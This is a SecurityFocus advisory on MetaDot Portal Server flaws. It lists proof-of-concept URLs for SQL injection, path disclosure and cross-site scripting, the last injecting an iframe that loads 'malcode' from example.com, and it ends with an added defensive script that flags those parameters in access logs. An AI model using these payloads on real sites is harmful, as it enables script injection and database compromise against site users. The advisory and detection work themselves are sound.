MetaDot Corporation MetaDot Portal Server Multiple Vulnerabilities

The following proof of concept examples have been provided for the various vulnerabilities:

SQL Injection:
/index.pl?id=[Evil_Query]
/index.pl?iid=[Evil_Query]
/index.pl?isa=Session&op=auto_login&new_user=&key=[Evil_Query]

Information and Path Disclosure:
/index.pl?iid=[ValidID]&isa=Discussion&op=

Cross Site Scripting:
/index.pl?isa=XSS<iframe%20src=http://www.example.com/malcode>
/userchannel.pl?id=435&isa=NewsChannel&redirect=1&op="><iframe%20src=http://www.example.com/malcode>
/index.pl?iid='"><iframe%20src=http://www.example.com/malcode>
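
Added example (not part of the original advisory or of MetaDot's code): a log triage script that reports requests to index.pl and userchannel.pl whose id, iid, isa, op or key values fall outside an allowlist, which covers every parameter named in the examples above. The value formats are assumptions inferred from the URLs shown here, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Allowlist per parameter. Value formats are assumptions inferred from the
# URLs on this page (id=435, isa=NewsChannel, op=auto_login); the format of
# the auto_login `key` token is a guess and should be adjusted per site.
WORD = re.compile(r"[A-Za-z0-9_]+")
RULES = {
    "id": re.compile(r"[0-9]+"),
    "iid": re.compile(r"[0-9]+"),
    "isa": WORD,
    "op": WORD,          # an empty op= is also reported
    "key": WORD,
}
SCRIPTS = ("/index.pl", "/userchannel.pl")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')

def check_target(target):
    """Return [(param, decoded_value)] for values outside the allowlist."""
    parts = urlsplit(target)
    if not parts.path.endswith(SCRIPTS):
        return []
    return [
        (name, value)
        for name, value in parse_qsl(parts.query, keep_blank_values=True)
        if name in RULES and not RULES[name].fullmatch(value)
    ]

def scan(lines):
    """Return [(line_number, findings)] for log lines with a violation."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        findings = check_target(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits

# Constructed access-log lines (combined log format), not real traffic.
PREFIX = '192.0.2.10 - - [01/Jan/2010:00:00:00 +0000] "GET '
SAMPLE_LOG = [PREFIX + target + ' HTTP/1.1" 200 512' for target in (
    "/index.pl?id=435&isa=NewsChannel",
    "/index.pl?isa=Session&op=auto_login&new_user=&key=%5BEvil_Query%5D",
    "/index.pl?isa=XSS%3Ciframe%20src=http://www.example.com/malcode%3E",
    "/index.pl?iid=12&isa=Discussion&op=",
)]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, findings)
```

The same per-parameter allowlist can be enforced in front of the application (for example in a reverse proxy rule) rather than only applied to logs after the fact.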


 

Copyright 2010, SecurityFocus